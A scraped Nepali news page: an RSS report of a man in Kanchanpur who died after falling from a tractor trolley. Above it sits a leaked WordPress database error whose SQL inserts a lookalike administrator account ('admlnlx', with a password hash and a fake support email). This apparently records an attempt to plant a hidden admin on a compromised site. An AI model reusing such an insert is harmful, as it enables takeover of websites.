WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmK8i1GyO1s10kayXcE9w1LSVoQwOl/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:03:04', '', 'admlnlx', 'admlnlx')
कञ्चनपुर,फागुन ६ –
ट्र्याक्टरको ट्रलीबाट खसेर घाइते भएका कञ्चनपुरको बेलौरी नगरपालिका–३ का अन्दाजी ४८ वर्षीय रामप्रसाद चौधरीको बिहीबार उपचारका क्रममा मृत्यु भएको छ ।
बालुवा बोकेर बेलौरीबजारतर्फ आउँदै गरेको से १ त ४८०० नंको ट्र्याक्टरको ट्रलीबाट भाटिया गोदाम नजिक खसेका चौधरीलाई तत्कालै उपचारार्थ बेलौरीस्थित प्राथमिक स्वास्थ्य केन्द्रमा भर्ना गरिए पनि उपचार हुन नसकेपछि थप उपचारका लागि कैलालीको सेती अञ्चल अस्पताल पु¥याइएको थियो ।
अस्पतालमै उपचारका क्रममा चौधरीको बिहीबार साँझ मृत्यु भएको जिल्ला प्रहरी कार्यालय कञ्चनपुरले जनाएको छ । – रासस